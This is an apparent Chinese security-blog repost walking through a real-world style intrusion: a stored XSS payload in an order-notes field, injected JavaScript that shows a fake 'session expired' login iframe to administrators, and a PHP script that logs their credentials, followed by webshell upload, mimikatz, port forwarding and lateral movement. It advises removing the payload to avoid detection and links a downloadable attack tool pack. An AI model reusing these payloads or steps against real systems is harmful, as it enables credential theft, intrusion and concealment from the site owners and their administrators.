当前位置: 首页 > news >正文

一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】

i春秋作家:jasonx

原文来自:一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】

前言

渗透过程中,有时候遇某些网站,明明检测到有xss漏洞,但是盲打以后,收到的cookie还是不能登录后台,大多数的原因都是因为对方的cookie关键参数开启了httponly,导致你获取到的cookie参数不全,所以没法登录。

今天和大家分享一次绕过httponly拿后台的思路。

0x01 遇到一个存在xss的站点

这个站点在提交订单的时候,下面有个订单备注输入框存在存储型xss。
我们直接插入插入xss代码;

</textarea>'"><script src=https://xx.cc/x/7Zbi58></script>

过了没多久拿到了cookie

但是我们尝试用cookie登录的时候失败了。

那么问题来了,如何才能拿到后台呢?

0x02 xss钓鱼拿下后台

因为xss平台已经收到后台的url地址了。
那么我们直接访问这个后台地址,然后右键查看源代码。

然后把所有代码复制到我们新建的一个html文件里面。
修改里面的代码,把所有相对路径的地方,全部改成绝对路径,(啥意思呢?请看下面分析。)

比如里面有的链接是这样的 /index.php
我们要修改成被钓鱼的域名加上/index.php
改完后应该是这样的 http://被钓鱼的域名.com/index.php

注意:所有相对路径链接部分都要改。

然后我们把action=这里修改成我们的1.php文件地址(源码在下面)
<form action="http://www.我们的php域名.com/1.php" method="post" class="login-form">

1.php源码如下

<?php 
$str=''; $str.='name:'.$_POST['name'].'|'; $str.='pwd:'.$_POST['pwd'].'|'; $str.='ip:'.$_SERVER["REMOTE_ADDR"].'|'; $str.='time:'.date("m-d-h:i"); file_put_contents('log.txt',$str.PHP_EOL, FILE_APPEND); #下面这行的意思是记录完账号密码以后跳转到他原来的后台地址。 header("location:https://www.baidu.com/admin.php"); ?> 

注意:你的html文件里面的用户名和密码的参数名称要对应1.php的修改。
name=的这里,要和1.php的对应,要不然接收不到账号密码。

1.php的后面添加上被钓鱼方的后台首页地址,成功拿到密码以后会自动跳回他后台首页。

接下来我们把这个html文件和1.php放到网站空间,直接phpstudy搭建一个也可以的。

现在去xss平台新建一个项目
名称什么的随便输入,在自定义代码处输入以下代码。
把其中的url地址修改成你的html地址。

setTimeout(function(){
alert("登陆过期,请重新登陆!"); parent.document.writeln("<iframe style=\"margin:0px;padding:0px;height:100%;width:100%;\" src=\"https:\/\/我的钓鱼域名.com/index.html\" frameBorder=0 scrolling=no></iframe>"); setTimeout(function(){ document.getElementsByTagName("body")[0].setAttribute("style","margin:2px;");},100); setTimeout(function(){ parent.document.getElementsByTagName("body")[0].setAttribute("style","margin:0px;");},100); },1500);

我们把得到的xss地址复制下来,插入到订单备注里面。
管理员看到我们的订单以后,1.5秒后就会自动弹出“登录过期,请重新登陆”的提示,并在url不改变的情况下,跳转到我们伪造的登录页面上去了。

接下来只要管理员输入了账号密码,并且提交,那么我们钓鱼服务器就收到账号密码啦,管理员那边也正常跳转到他的后台。

注意:拿到账号密码以后请迅速删掉你的xss项目,要不然管理员那边每一次浏览你的订单都会跳出这个登录页面,避免被发现。
另外实际操作的时候,你可以修改下代码,比如判断是否登录成功,或者修改延时等等,我这只是提供一个思路,抛砖引玉吧。

然后我们用拿到的账号密码登录后台,找上传点getshell。

拿到shell以后我们用 mimikatz(咪咪卡住)获取管理员密码。
然后通过ipconfig看到对方服务器在内网,所以我们需要转发端口出来,这里方法很多了,lcx转发 ngrok等等都可以的。

转发出来我们用获取到的密码直接登录服务器。
先收集一波内网信息。

net view 列出工作组下的计算机名称。
arp -a 查看arp缓存表。

然后就是横向怼了。

附上钓鱼的演示源码
链接: https://pan.baidu.com/s/1VrvYXLy4ozXN-8iR7Uj7rA 提取码: giu3


∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷ 华丽的分割线 ∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷∷


以上都不是重点,重点是我要放出自己用了多年的【渗透工具包】啦。
里面的很多工具都是一点点收集来的,因为都是来源于互联网,部分工具可能存在后门,请大家下载以后自行查杀,部分批量的工具过于敏感就不放出来啦。

声明:

工具是一把刀,既能切菜,也能伤人,我分享的初衷是便于大家做授权的渗透测试,所以请不要用于非法用途,否则一切后果自负。



 

阅读原文即可下载渗透工具包

原文地址:一个xss漏洞到内网漫游【送多年心血打造的大礼包啦!】

​​​​​​​

相关文章:

  • Python基础06 循环
  • winscp 怎么用私钥文件登录的,以.ppk结尾的密钥文件
  • 敏捷开发---综述
  • kafka扫盲笔记,实战入门
  • spring如何从jar中读取applicationContext.xml配置文件?
  • Spring Cloud Feign的两种使用姿势
  • Tornado实现多进程/多线程的HTTP服务
  • 数据库之左连接,右连接和内连接
  • C++ 引用
  • ES6 ...操作符
  • 2.Median of Two Sorted Arrays (两个排序数组的中位数)
  • 轻量级kotlin + Mvp + Rxjava + Retrofit框架
  • HDU 2722 Here We Go(relians) Again
  • yii2-queue一个好用的yii2队列操作扩展
  • ppwjs之bootstrap表格:响应式
  • JavaScript 如何正确处理 Unicode 编码问题!
  • const let
  • CSS实用技巧
  • Facebook AccountKit 接入的坑点
  • github从入门到放弃(1)
  • Git初体验
  • HTML中设置input等文本框为不可操作
  • JS变量作用域
  • js学习笔记
  • pdf文件如何在线转换为jpg图片
  • Spark in action on Kubernetes - Playground搭建与架构浅析
  • SpiderData 2019年2月23日 DApp数据排行榜
  • ucore操作系统实验笔记 - 重新理解中断
  • Web Storage相关
  • 分布式熔断降级平台aegis
  • 买一台 iPhone X,还是创建一家未来的独角兽?
  • 融云开发漫谈:你是否了解Go语言并发编程的第一要义?
  • 实现简单的正则表达式引擎
  • 使用 Node.js 的 nodemailer 模块发送邮件(支持 QQ、163 等、支持附件)
  • 树莓派 - 使用须知
  • 携程小程序初体验
  • 学习HTTP相关知识笔记
  • AI算硅基生命吗,为什么?
  • ​软考-高级-信息系统项目管理师教程 第四版【第19章-配置与变更管理-思维导图】​
  • #《AI中文版》V3 第 1 章 概述
  • #Linux(Source Insight安装及工程建立)
  • #微信小程序(布局、渲染层基础知识)
  • $GOPATH/go.mod exists but should not goland
  • (1/2)敏捷实践指南 Agile Practice Guide ([美] Project Management institute 著)
  • (2015)JS ES6 必知的十个 特性
  • (30)数组元素和与数字和的绝对差
  • (4) openssl rsa/pkey(查看私钥、从私钥中提取公钥、查看公钥)
  • (二)丶RabbitMQ的六大核心
  • (附源码)springboot青少年公共卫生教育平台 毕业设计 643214
  • (十七)Flask之大型项目目录结构示例【二扣蓝图】
  • (十五)Flask覆写wsgi_app函数实现自定义中间件
  • (五)MySQL的备份及恢复
  • (一)基于IDEA的JAVA基础10
  • (已解决)报错:Could not load the Qt platform plugin “xcb“
  • (转)为C# Windows服务添加安装程序